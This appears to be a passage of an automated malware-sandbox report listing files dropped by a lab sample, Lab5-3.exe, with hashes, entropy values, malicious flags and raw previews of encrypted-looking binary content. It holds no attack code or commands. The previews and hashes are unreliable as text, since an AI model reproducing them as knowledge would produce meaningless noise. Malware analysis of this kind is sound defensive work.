                                                                                                          SSDEEP:96:Lrv6jrDq7iz9VCJy0VxA+x4K2xzuZEcz7Cvwb8PSSNKLEuOXXj1/1lWfF6M9leG7:n6PmifSXAu2kZEekBx7vm50Cb
                                                                                                          MD5:F67F935AFBC146DCBC126E31832F2272
                                                                                                          SHA1:DF878D93756BB0071B19156A6EC8E3F6EFA2BD8E
                                                                                                          SHA-256:27EC934C7E227572491B02E103CC583D2008B72EBCC585EA3963260D6C5C5EB8
                                                                                                          SHA-512:C30C149DE21D5A64E87040A0C3649B2E1CA805FC9A7E1389965EA0B03D028FAB0C1407F78979763E84B104B9BFE21A0D16A110477C2E8FE5CD14A1B9E80846AC
                                                                                                          Malicious:false
                                                                                                          Preview:.r....p..b..(..._\.+.U..?.I..\..79.>.M..!..........m;8.P}.<.A.T.af.....]hA.x...'...ZyE8VS#....jT..M._.yPK...k.B.XJ...?.....|...;.]..,..V.99..4b..Y...+.......[..N.U.v.2..a...0.h.^s...M.^.....YM.....@....U.3|.j.....E..Y:..V....b.......j.....?.b........b..{......T._..TJc.Tb.W..Z.7T.`m.:v.K..^D.R.(c4....-.C..z..|.6...p...[../..;.cF)..[.Bd../.0.f.f.^*^G.^I.#.9....Z..6..K/.x..G.5..........l.y.J.....&.PN...x.m..o"...&t$...YY..M..,.a+.....I...,..fV...^...sJ....H......n.P..F.&..L..z...4*........pO.k~.|.{..<..G.Bk<hp.....`....j.5.l.J..".O...].....T<T.G.&@...\Wl>.n.z.{..50p..I.T..DeF.a....+L0..A.......l..4.?.c....|H6.<m...`.k.m...u..x\...C....1....g......I..wb..!.".W.....?..M......}...E).t..x.`....J..f.6..i.x..-'Wa..C..p}........#..$:.X..&.h..b.=..B_.(..CW..lb...r...}.t\9[.-7.f.l..!.....f.)..O...#.V../.A...Q.N l.O*fYR...!.T.lw....i...Z.3....R{U....=X.....d.J.L.%z..n..P%.<.(3..mA;.ip......^..6.&.....&>(..M..J..$..#....s.......z....M<...:...GX
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8512
                                                                                                          Entropy (8bit):7.980231749148318
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:gCtJs9zo3q4hbk7WTBMMmDPAHUy6ngbQjBzM5e/Ci+gXH1fGFqNzunMIQAEI8MjJ:gCPCo6kQ7oVfFdi+i1uwzaEodR0Cb
                                                                                                          MD5:ADD66160DD91147DAC04647C023388DB
                                                                                                          SHA1:8781577C528D35D5058F034ECFEEBDD703A8379F
                                                                                                          SHA-256:26952633BE92D33490745E2079C1052F1FE90CEBC0988CB000FA9BAADF491D9C
                                                                                                          SHA-512:EDC67E4F8E0ED5FC78DB9A2F6670A837BC2CE347BA3C9B9396FDB526A08A3C64BB9A99EEF21E8ED0B7D60FF02A5C717F3D06D923E222E6EC599BB40E499AB7C0
                                                                                                          Malicious:false
                                                                                                          Preview:.9e....p...u.W7d)...n..XC...2"..^.'.k...@....<..z...nI.......9..c.J..Q.E&...Q...V....29..<.............:.L.uq.Mi...Zky....jD^....@...H..\!.FD.5.f..Q(..,..2.Q.t.....U.a...C{+...3R................?..as....d..]c.72"....u.~\.k..:[....L.UA...y0....#@.u...$+wk.)i.H.._".mk....Sd.J.4.4...UQ....pv'#E...T..])..?.7c.1....S....R...J.3..[...#S%Dh...I_E,..&.0..4.Q.Q.!....$.?.A(..D.E.w.7.!E&.2..X.wgO@8_......u..Y$a..4..o.0....&..?.?.%..Lk.H+..qR..t#..Q.1+.. ..0i..\...|-1-...Qzjl...n>C.f.n...>a..0.....<.V.4...0.....}....|}$"V.I....z..JF.D.....A6n2.9..y...]..._.....z...Rg..V.A...P.m#.h.DH_..!..D..P.;.. .........P.#/...........{H.g_..b..u.......R#...Q.LIwf)U5.%<l.,..l.......|(..[n..p.P.L...m....Go...q=..h......`..C...L.qU[C}k.^"...T@.i.....u#.f.~..Z.F.X](.H..\.c.d.2.%..#.]e..h~.k...Y....].Bu.p5\....n..tP.MF9X..-U.....Z..fb.)`.$.F.R..zE..s.G.[.5Q.('G.M..z...R2IN.......x?.:...V._.w....W.172......4..#..5Z.?E..3.)..\4%.QK....w..mrr.......D....y....M..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.932281831487132
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6ri9hx0Csym8gtdPD+jUHF1SHfUTid3hBaUoSGFcmeykEdEElU92i:bbmC/m8gX7NGx0uKeY2ElUJ
                                                                                                          MD5:71C42D2EF99ABFBA11B8F0BCBF9FCA95
                                                                                                          SHA1:3700E7BA53A119B48B72C47EC05D6A75D4BA7FA5
                                                                                                          SHA-256:72234B92826F9933F32441D8F50552475F946AFCA2664B231C3CB51FFEF638E7
                                                                                                          SHA-512:5AA8BE9784F25F7DE1D5B00F24AC8A8D9AFD82D0F4D6E7B45256D702BC7BB8F3A621A1A081E827FE5F09B40B5FE659BB89C9338A61425F3735068FEBF82C5C21
                                                                                                          Malicious:false
                                                                                                          Preview:.}`..".8h..m..*..dG.y...P3.z.1l... v...S*.....W.o.s.. 6..ja..]rF.......).........$.z.5.Z...\....s._.l1..I..w...m7?2....?9O....'n@ze8...9.... ..Hr..J....=.e.^..(........W.s... ....A.M...@g.u.[.q..EeN..g..=m.5".I. ..P.z.R.....@G..]..<......p..B..(%.......A..:.];.%...f.o.kS.$.X..5.].^...`B..&...K.n..,....w...A....3tY3Q~_l..{.{......I..[.A.{.....c.R.=..C..P.1...>fox.NZ.=/...2........49..H..&>_(.3v.B..T~.3..|...",+Bd...).C...z..}.1.(2..JG.!.....X.-......Zc.|.p...........`..K..W.I...W.. .,?Y.;>Ga.%h.`H;[.wr.o..0..c..K......Co..2.4.9lb.....<..}..|..........b...n).....|..&j._6`M2.....Ao...T....dn.8./._.3g..$.X1:..w~w?9. .@S..|.C...d......Zw...h.h...a."k........&%..!.h...("O..3g........].~.y_.Q.. .....l...K..2.g.../F~@.......G..............&\....j.>......2.n l..Q.5;......f.7.V..of..3.Q..R...ple..;,....{.....5@.......E..dCh..7Q.Tv3.#G..p....k<P.T.L..l.J...+..5!.&_.....G.5.(..b.....Ga.h.`1....y....B.T......@...R.<.I.z.{.4..m...D......E...Ukp@..`.b....#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.924185064522714
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:PZd5OVTA8eeY5e6bHxtYzBYoptnOHfUTid3hBaUoSGFcmeykEdEElU92i:PJR8eep4HxtYzKGGx0uKeY2ElUJ
                                                                                                          MD5:38B0A8186F6671E319EF21E66C9609F2
                                                                                                          SHA1:D21BEF87856188E44A9F3EF3E2E43073CB7C6769
                                                                                                          SHA-256:667BF4CB7DDFECD4F89E3FE32F7EBDB8B27E7A209AA313569A4E34E096717683
                                                                                                          SHA-512:8D0220CD88E93FBA96B9A633A2A803A4487EF905F19C8F45D668B67CFCAA395FB3BEA7C0EBE01C538F8546E3D43605D64FAC3DAF7E6FD25D460F0DA4602806CA
                                                                                                          Malicious:false
                                                                                                          Preview:...M.yf.j...<...[...y..#.C..QL1.A.Y....'.................2.e.NQ....T(/u......A....W..q.@.z.W.....al..&..Q.......5..2..........6K}...".....E.y...$.5...a'.b\.....,..M.8.c...9:l0.[;.O..p.....H.>..*.~n..*_b....H...K....'1&m..%RT.Q.)......G..~..7r.\S.U...C.X.A@t...X2W.|6..f5..O.A..E.E.,.Iyf.f.E..@..Z..@....Z..Y.....>......`...T..?.S5.......=.!.Q%..+.\c..pzP...c)..4....#a^D...Do.X..5.M......wS.....l.c....N.....O..I..h..l...........=.Q..CG.l.e..oQ..}Ws..?<.vK.F}2.o.f.b..%W...hi.a..GH...BMZ..\s.)It*.....k"Z.)s.......z.6..Dj..q.K..5...h..e...."...c...D..h..........LZ"z....2K..1....P.J!.0z....S.wA.....xQ./Jz..Gs8...;.tB.....Uce.ja...[".Um<.}6x...\"...[..d..aT.O.*.......No...Jv.u.^.....~W.\.{..8.j.dR)jE......4...WP.,..La..xJ..5KyO..x....ns@.9.E.Q......e.6....h.............(..f....._..K.u.."'.A.v.Z"2.z`...GA.{yr...O...4..-...L..d.7../a..&>.GF.B..!\,..Lq...J...O.@p%......cQ.-.4...p$....P.t..<.....?(.d~v.O.......v.....;.J........t.1:.V..m.y"S.|1...t_4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.922416275087155
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NcyzNIOoEJPj3tFlAvsSwhXCZq4zHfUTid3hBaUoSGFcmeykEdEElU92i:NcyaRER90vHwtjGx0uKeY2ElUJ
                                                                                                          MD5:68DDDD3E399CFF7A235F29E6435CE4DA
                                                                                                          SHA1:C2195F7F696647674BDAD253AE0E3361AF1461E2
                                                                                                          SHA-256:8B0920FA5D4F7A81C09B342ED939654454061EF910847731B4F48B4F26710DD1
                                                                                                          SHA-512:008A53808A87095B951C4078E58B99918A2A84A5ADC597DD3138A70EADA6A60DEB92C952890D2C69F16E612541B58EDFAA222E795C4BD02D8596D5FF2CBFA7AA
                                                                                                          Malicious:false
                                                                                                          Preview::....F...B.v.5.u..U,y.&....^.......Va.~av..*.Pt.H.2.h..eu.......P;.>.,/S..j...o<...Y...]~...u7:.k..e...r.....(hF.c)&.Pe...A...uM..p..J....H3D..aR\HG..7.....aS.&.......... ..?.4...j@.e...nr.."c.<..'..E I,s..e.W...8CK....6.s4Cil...iCo.6..!.wZh...[..N6.(......lZA.h7......h4w8.....-.Z.4GR|..jY.a.``yL......D...\T.}.....q.gu..@...}..-.|.....f...q.AF....\X{N.;...Ku.................d.d.I...t..*..by,.U5W./...o<.....m.74....O..v.H..7.....'Fe.%`.Y/J.}h?qaM..y.Q....E.,....>..w.*.7...B...n..P.g..GO(.......3..6..b..@m.p.K-.....2.=.x..J....k..W.\.Nm...b.:{H.~g.#.j.W5LF.C.".Mu....g6.......K......R.X...!......r..}$..0..@.d/...c.T......iPc....V.)....w.J..Z$..@..ar..'..(*s......J.]!M.;..c....KWB.$......a...|am8+...._=7...a.2.oCA.p..3O'l...........k./`....y.9r.:7..c~,.m.H{....?.f]A....`.G......E..e...Yi.>..gX....7@...?Pe.*@.KLC...g.Bj...=.@U.lZ.N9..7.i..&..P....C.b...#........?w.@..Y..8.......Uu..O...^...q...>.5..._....V+Y.......W.@..s../.K.[J?.p.PM.-.p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.919318494504129
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4va0TLqbgXQNNmtM0nozmSUWmUHfUTid3hBaUoSGFcmeykEdEElU92i:4vSgXQ6OvdUWqGx0uKeY2ElUJ
                                                                                                          MD5:BFC03FBE185CDDD88B95643F538A4997
                                                                                                          SHA1:D27C880F56F0F0356A62F4BC3F8150866504D101
                                                                                                          SHA-256:A8AE5A7A72FBA6432C5C701B059C7893378139523F75A47C59FD2C5A0844C1AA
                                                                                                          SHA-512:65751EE1B255B7F7088A6F28968E335BAE2AB48D23814D253F49D9F96E796D8F81EF6C8BFB64ACEE132DAC890F8288F565FA0FD3C67FD27CF9793AD0F7743F42
                                                                                                          Malicious:false
                                                                                                          Preview:.&^............S+.....k...N.!Y.D....&a.x......x...n_....=..;..Wtq....#.........'...1.^...b.U.{..b<..w....)$..u...T._0.>.!G.....n.`.....LS.......Q*.;.N4....|....j...R..>..\..Ya.=...../..=.>...j.d....hi.V..o.=.....%"..2$....x7.A.873.. ..w.c...Wg^.........B.we.4,.|\.Uz%p.[.o..p.{J..C.Y..j5CJ.....r.|p..zP....../.t.<....p....?y"o.b..\N?q7.`....n7..4#.#jWq.4PX..v........|....!..Q.1.t...qn9..&....H..4.~..o..O[i...>6....G.t\z.BX..$+....u..M:..mL.V.w.e&Se:..&....c..y9w.b.....R ....zYntC8.]J3.GH.dOY..z.Y.......3..5...Vu^d....v.-l...f........fi~...OP..*..`.&.9.,.c..yjC.l.......J.B.+.....`.e`......I.a.O....k....Q.......n(E.\.;.<.....M.p.1..}..]...C.....#..T1nA...m"h...e....5sx..L..&.].`C.T..G.^m.....M...:.E..-.&zN4..-[n..R.c.....$.._r:y.vk../7...4.....p....k.R.P.E.........p&..f.e..di...I<..1z......O..b.....z.X#..{V..p'.2...Pp....Ll$r...... ..(it.+k.f^.....u..]^....#.....K...;.>.sot....&.`.[.'...V.L....l.d.....I$...-zY../..s.....m/..~.g.~.|1..._...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.945293094504663
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9moGMVi0F6PG8qt4yKeEF6Gx0uKeY2ElUJ:FfViw6P8VrEFp0Cb
                                                                                                          MD5:147ACDEEE860146856624C7D536FF49A
                                                                                                          SHA1:E57F52C46F7C3D587CF1F5A70BEEC875E60D1A5C
                                                                                                          SHA-256:E46C205CFDB26F3E503F81C90160C304D9AF25416E6FF7FE5A20C195A8E47F34
                                                                                                          SHA-512:5ADD105FAF9072B53A168F689EC7BE3322B61606F4BC6678364004BF4166AEBAE14E353659DFFD0E3F0F7C372092D46E62CDEAF5B58806C45EA02CC09FE989A6
                                                                                                          Malicious:false
                                                                                                          Preview:9L(.\.].%. .*:...........\....Y...Y.?.b...8w..L]....Ev.[.(s..}9.]....e.../..FqKLf....s..DFF7Z.g4..!1..e|.r...Z.)....I.+.y.t[...."k%..l...,.w... ...L...!.O3.iP+% ......qtV........!J....Y..%.P...9...]...WM...k.*....v....F..7...m...b.[...F.dQ.3b.c...m...F....3S....G..R.U..mNUn.g..{...;..+..df......A#..b...*.{H........weN.]...........2..Z.A....S..KU1.... .R..mp.."....%.j..-R....>.....Xx55..S0..K.nM.e.%...y...0&*1..Y.. .p@fF-....1Z..O..c..F.#..H.....xL..#..y#.2.......O!R...o@...z_...S^R..>....7.O2.m...c'._....T..n.~...SFB....f...}.K......E..N..B>6...D...0.~2...V....!.~;.......b.YP..B..XB..s.a..Y.....rq...V'...?i+.'T.......!q..Ut.(.qs.2.....;r.}\.\\..G..^.......Q.9..eB...F.e.........n.z....n..3..*0..}{...E.M^l.d..d.%.o..`.&W..oa..b...,..2..9`...99....@..L9.~fK.o.{..|...f........}..A....P.@v..._..']..2..7...;.1...\.#...6.8.|...?...9.@...>Jy.:.....U.u2,...g#..:...hZ..#.....$...2.'f$.....b.uv=.....?d..G.gt.0.F'D...&(..G..Q.'c.`.[..-..h?.t4...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.909092186909136
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2xGxB6g1HfUTid3hBaUoSGFcmeykEdEElU92i:2x+sGx0uKeY2ElUJ
                                                                                                          MD5:DBDFEB03776857EE0CB6C3D973707311
                                                                                                          SHA1:119F37268A70E7592B115519C577FFAC6ABB5D52
                                                                                                          SHA-256:E256DF9AD3C967D78C61A065EBE3117AE1CE8B3227680AAEE4F1C6A0393C577E
                                                                                                          SHA-512:30F189223864404C859C03E3B1764DD9529F19631B99883B642DAD0CDADB2462F45EF34462A3933FE2F31951A204F0959DFE0894B19E3DA96A3F8B686825E708
                                                                                                          Malicious:false
                                                                                                          Preview:@t....t+0........p.M.(.A..ck..|.Jj=....>.P..7[%.....>.kRWWivo.Ppq9"6..3<..G..3*...&q..].yt......7b.=...8..nTh].]|X........|..6.y`.M....#.%.U!.:..K...Irp>.3...&.1.M=Y.Z...L..9...C.Sk......Y....>..!2U..K.V.U)@.bB...Tc=..H..-q...Fi..J...b...y../Gi)....pY.-..y...dV...X.T....U[.q....)..`..Bh..p<.[Q..g..5U.....xI.....c.e....e....N.Y..w..Ga...P....@....."..V.UT. 5o.w<C..}CW%...2).).6...TEW.ui@...t.....80.......@....g...-....C5.?..b.U..4..+p..M{T.~..)..!.h.C@.3Vt..f...w\.u.j...9#..=.....7r.. T>.*...>...?..../=r..."....6I=.~k.B4.....'..bV..g.....roHh.O..u..m.k..>.s./&..f.".6..rx...(.......^.%........O.^.9....r...............]..F.@.7".=XWe.....,...'..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.922381878297942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tsR9FXDhx31xJWtjzV/PELsmNk4HfUTid3hBaUoSGFcmeykEdEElU92i:tkHD/PJUjhHELsmNkfGx0uKeY2ElUJ
                                                                                                          MD5:9208965F9666A03775D103D9DD32A49C
                                                                                                          SHA1:F22517704F07C41EE23ED199AB31809CD3BE87C1
                                                                                                          SHA-256:3CC5986029D03C5BB87B75C1386317CD25900C48E2A81E121D2DCB96FB7B0426
                                                                                                          SHA-512:5FF6EC2584F36777A39A75BAC24CF4785660A37279A44548F300228F82F509F10F8A5AB998B7889DEEC8A592338AEF1B2CED485DFD50B4935F1F6DDDC8941629
                                                                                                          Malicious:false
                                                                                                          Preview:.G._2.~...%....W.....G...:Q.....J.xT6..Y.....Sj.......A..U.N,..L..F...:.+1..n....R.|...}e."...U.iVF.H+....:......p...m.%.5..<.s*....G.z-lD...H...M..M........n.\......S.{!..I..=..]~x.)<j....U..:....l..g.;.?|..E..nk..eBY[Zk.6..r..2.>.B..G...p......[..P.o.....R....!x..P.v.-c........,)!..X.P......f....2..Kq.....E..*.p.;U...K2..GF|...=.}k.......;6.I.5...Qr..z.......e........'......x.C.......e....x.c.q>.'...j.|Bf.;~..g.;.....C&.rP...t.....Pt.t.&.@q.C......2..*...<.s.b...N..,oMY.IY..-.d...9... eV^.noA..&./.'.c....pE..t......ZeF.sna.....f.5<Rpb|V?.].E.N.wF.L..(...2..Q,..N.E.}.~.^Z^_.=.2I......C2Q..2..C@...[...R.3.> .j.D..G..Wg..^. ..U`...`.S.zv....<.....Bj.t..d...}.2...+....B+*9..S..;.A3..K..>.>og...R.u..?.<.Y...g:.3.y....l.\?.#...O.]U..e..e...=aDX.iFH....'J.}.)..d..=.........8i..c...j...%....g.+.,:.:..4.N4..T0T...!.o{T..7":~.c.F.W.d..p..:....... .A.c.E..A....0f.:.G.z.i>|cM+.]_..G.Iw......(...X..h.I~..K.s.U.x...&..#.R!B..9.......I....*aM....#.|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16192
                                                                                                          Entropy (8bit):7.9899912360035685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:IlHp1a1uOgtcZEGvQK5DTITEtLk37wQpy2XiOx/pj2h1vxzctb:I31a1uOgpGvQ8f+EtLY7wQpyYiU/Ahti
                                                                                                          MD5:BB8C79751D172FC61599D9AB4133C74B
                                                                                                          SHA1:C335C11765D08B28F43EE519835C4FF679E98939
                                                                                                          SHA-256:29F7633C27C56776D848BE50AFD7FB008253377E211E00D132FE06DEEEAE40F3
                                                                                                          SHA-512:F9A8571589AACE14733F9E15F326640A0D946BCB39FBD2C8998AC2AD39DA2BC8C9D09EB2A037E1A53965D2BB68868A3DA7BB56BD76776C63543694E005516FE7
                                                                                                          Malicious:false
                                                                                                          Preview:.|'.`....I..;3.:.<.....?..Q.>/.T.V..].......&..R.|....1.6.er.[u..o..c.#T.;`pM>..j7.......l.....J.4..y/.c....*..1J...._k..2.&.?X.uy...W.F.M.&.%..l...,.....`_Y.96b|g3.".9..0......}.B.....bQ.Xwc..(%..|.,...b..O..8..IL..=.XoB.Ji...;9.x...Lz.&UB.....A.8.2,....V..G...*...S.m5@h.Q.d...P.'@.k.c~...c...........i-*...z..ZTZh..*6.1..A.5-.p....%.5.C...Eq1."..MOy>a|......w...S..**upK.......i...%.....vYS...}n</=..9S(...J..e....tq....@x/8....&\.{..~......M.wTk......./Z.F..5b%I;99...y..K./.Y..+.J..u0T.x...[..".X......d......5.._...%%.l.4!8.:y`.?.E.....9....T).....%...E6s.E....N..N....xi[...@.^....X.......3.RP\[6.{../. ....I..-...G.......*sG..sW...N..i)k%/..%d..t..=Y.-...)BW..........F...UF...cw.d.g9><.>.lXp..$t.DX...A4..%....A.e.......+v:.......L.........'.......Z..B.C..<3...... ...@..H.9.R..;O..'%...G.mAz..../5.BGI......Y......nJ..4'.f.@tI~..:...Q..C.x..?._"......$...a<p.1^..)...t...M.Tys#dW&W..|.N.=..!WdL=.V..._.v..&..B.........9.2J/.'E.<.....q...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39056
                                                                                                          Entropy (8bit):7.995757792515892
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:uouHte5I2MIALIdXevDv+2Y8KZUmdFL2NRiTA78uHGOORIHUynjeeNp6lhr8/Z:gf+A8dOvDG2VKZ5FLy/1eRIHU+jeeN0G
                                                                                                          MD5:472E3627386AFF53282710950CB76AAA
                                                                                                          SHA1:BF7811437C6A5ECD1ACC08E8662683F2BA9A64DC
                                                                                                          SHA-256:A7631C30C3A945B9AD7949EAAF3EEF1DEA5396D86617D825031192C1D6FEF5AB
                                                                                                          SHA-512:7D8BBCB07CD80256861979A6E97B21D270466245C37E44D1D8E3C658359047F23803F9DEAEC77106BC8C06D2043A8DC3F43ADEE3AF21E0F8F8BC217EFF921329
                                                                                                          Malicious:true
                                                                                                          Preview:............J..#..6a.?$..(.l......E...bu1..#WN9h...!b.Q<.b..*..".P.h.{i.qy..A...@y...."..Y]l.V.1*.D..~?v...q.%..by.K.P@9.S.o`F:D.H.K+9.|;..+..q......=SkRQ.?.^....nY[.....Z..8I.C..)..........:...Y4.."B.....J6Gk....7..m.k...R.-.n.G.......'...0A,..m.A....~.+..Pc^k...uV....1...-...wrb%..]..%.j=.,/.b...g..U.....!...{.N"h...[.o.k.e..E..0R)*[. .....!.m.=S...g.].."..$.....$8.N.B.......V.|Ma`2.Q.8YF&...d[ ...[{.r".....=d.L.%'..v..t....i.....m73...H){..&..y.OE..I.....[;zj...F.R...].L..a...f.W..`.k.<.......?..]...4...7.W.... +W.y.. .Q....a|=.! MalD.4$CZ....lP..#6..........qG.4..ib...K.p.s..W.ph...&...r.{...vy..<.._.L.%.d........$....0.]js.....id4.*.(.....z..#..TXo..W+.:.#.,N;..h..0v.m.d.;.....3.|u%.i..Z...m..Z....d..u70...K..dz.W....~.F.m..K7.k.j..=N..~8X34.@..}.b.5f..5w2s.}s0....7.....tM,.y.P.......x..(y.n.-.?3S...../^.Z....h..$.Zy'......-..@.......W.0w...>R......q........1...a......|`8....J.........C.. U..fxvd}@..w.e9m2sN.........l...Pu....~7.#X.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12352
                                                                                                          Entropy (8bit):7.986822267928406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:EPEFtu0JpxUGBapfOch2z1IvoJyIkXGju50jwUQ7Cvtb:jtNxxBIQavotNTG7iZ
                                                                                                          MD5:45BE590548EC1C1148A64773324606F0
                                                                                                          SHA1:106473AA05D8AC6E2B14C49AAA8EC4829E29EEA2
                                                                                                          SHA-256:743DDC44132536A10230C40390D5580D73F89CF515EAD61708B5B6A104828BD0
                                                                                                          SHA-512:3D159A2F260FD075EFADF7363E5F9419E46EC49E5FD5B0CD92349A844BB00B5FDE4DBE16575C6D17B4D197FA34D6BE4123755CFCD9A5A7C721FDCE353B852146
                                                                                                          Malicious:false
                                                                                                          Preview:..[...!.v..<.{......>........C..e.....-..B.i..a..N....iyL.J....p.GRE&..u.v.y.@..|G.Q.....nw,q..&....a.....]......%.....G....3.Q...Bn..EJ4N.:r!-..,....'_mO]#.........?.....Z..40...}.!..x..&..Z;W...I.p..1......).k.>..{.|.0......... .+es.aK..[..&.+....I<,.......s...G..uj6....2>?....>.+...u.0.*1......p{..:e..C...|.f.6B.f.4..........*.H...]gca;8^....B0._.v..p//...W. .w..h.q.j:x.b..4oN.sQ{...5....SS..l..e=....p..9b...Cs.....:u.w.....e..:.xn....Wg.q...X..Cx..ve..1tJV.c.....:..&..[..,E..ND.G7T...w...s~.SK..........Ff....|HY|..#.....g{.?A6...6Ds.e.yod&..T'..1...l6..o.X...\...&.T..Pc..@.t..<.m.>...Z;r.....a..L.}}.6,w.l.4y.Kd....[.1.R\z1.sS|6...Lh.......6.6@..V<.`.....7.....\...1k......@.......$BP....=..{.'-.]. ....B3.xY..f....l&.P/..b5H....M..|..RR...#{.ty....:..~.@e.:D*.''2X....NT.b@"..X...z$.mI#<Af.....gu........J).a.`...6.)eb.v=t...$..Mi..%)-..BQE..P......x.*...1.......D...H.?:I{.LU...rBc~.3.>..$K.. %#xZt3.A...n!.....z.....Upf....I..@..Vww..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28864
                                                                                                          Entropy (8bit):7.994421440876866
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:QurC9FHSBW5sV6BIyTCLYWilB5GHUvDB9d4u1E2Eu9vDNe2jYEKH7ZYCWutTMHtb:QuCPHF5cXQB5GHONUu1PtDNFKH7XdWHZ
                                                                                                          MD5:AA1151B42C883EDB91F6B4D3A2F26B8E
                                                                                                          SHA1:ADF3FCF424D1CFB16F98AECDC0F2879F2B059964
                                                                                                          SHA-256:E5C417352358A936EB759F29F20C70825B6BBA371F17C836DD689D3533313F83
                                                                                                          SHA-512:0E1A44984937398594BB8312EFC333D07FEC4534FB7FDA9B55BF5DE23922E895626436D7FA3DF7AF5FE479EB38C4DAF12AE77EC75E05AF4AB65827BC432EBF46
                                                                                                          Malicious:true
                                                                                                          Preview:.....DH..I.f.O.bM.k...I..{.3Z._.....&..i..)..ii*./...B.g.w.....,.XK...#p...kQ.lz#.t.;6>.'.....w.....m;.A.>xfj.'...j.0...0...n{>.R. . .=.{.)A.03...z.D._.f...T..W...8!....W.{9f\FKy.znZ...r~...~..t.....2r<..+...O5C7.N.='R..?...Jz2../...W.............}.i.....h.Z....:..2...(../3.1&...U........X<.so_.ZsXa.y2s..]j. ...b....!..B.....0TH......,3...-;d....wr9J....,..~/}.d.E..oq~i.d.G..J.V..U...@ ......S.....w..2....>...yK.d..b.'.Z..R.as.....".#$<U......Mk.=./.....J=.._.Z...G.fk...h.:$.:/{.t*N.(h.Q..Xs^.....=<..u...L..W.wW...a.,.?75y.X?..aD.I.H...hZ./"45......1.....2}j.6u.....*...5{.}v.....y\e...).^...).b..R..}4'...Z-...2.>..E..d\..L`..^r...U.........P3^...CEv..1)..).\...h..:...:....;..)..Y.x.......m_.E..Y.4.."&.s..T.rF.6{..r..I.5.............*O3).v.,..r\.X.C....LvH..]..i7?G....r3.,r.=..<... ..f..V....G:~.P....^..z......g.%..y!.>..Qa.5C.G+.....k.%&.q.{g..V.h..`.......u.7e...........m~..Q>0.,k..aP,..!.@].&.[..a.{...:.^.6u.2<...S.f/6E..L~.ih+Y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.933417726737466
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:yMDSM1QsHivua0J8qH3/vQ9VUQHfUTid3hBaUoSGFcmeykEdEElU92i:yMDSMuYofoAMXGx0uKeY2ElUJ
                                                                                                          MD5:D3D23C50D1149222C883A4DFCCB74DF9
                                                                                                          SHA1:5C26FB3B2D991BB0335BB98259F3DE2FA497B911
                                                                                                          SHA-256:DB84A3AC65AF188BD7A195D6D8E968A5F9C3855470CFCAA116C94353834D7C5D
                                                                                                          SHA-512:AB58AC3159C9BFE69C7D5534C9CE98B5A2A0DB2FBB049265C66F31F51F089E1FEFE8E80D09B2750352F5F19BA3CC70C62FA0A0F37F3C6A2205B662C6A55A6743
                                                                                                          Malicious:false
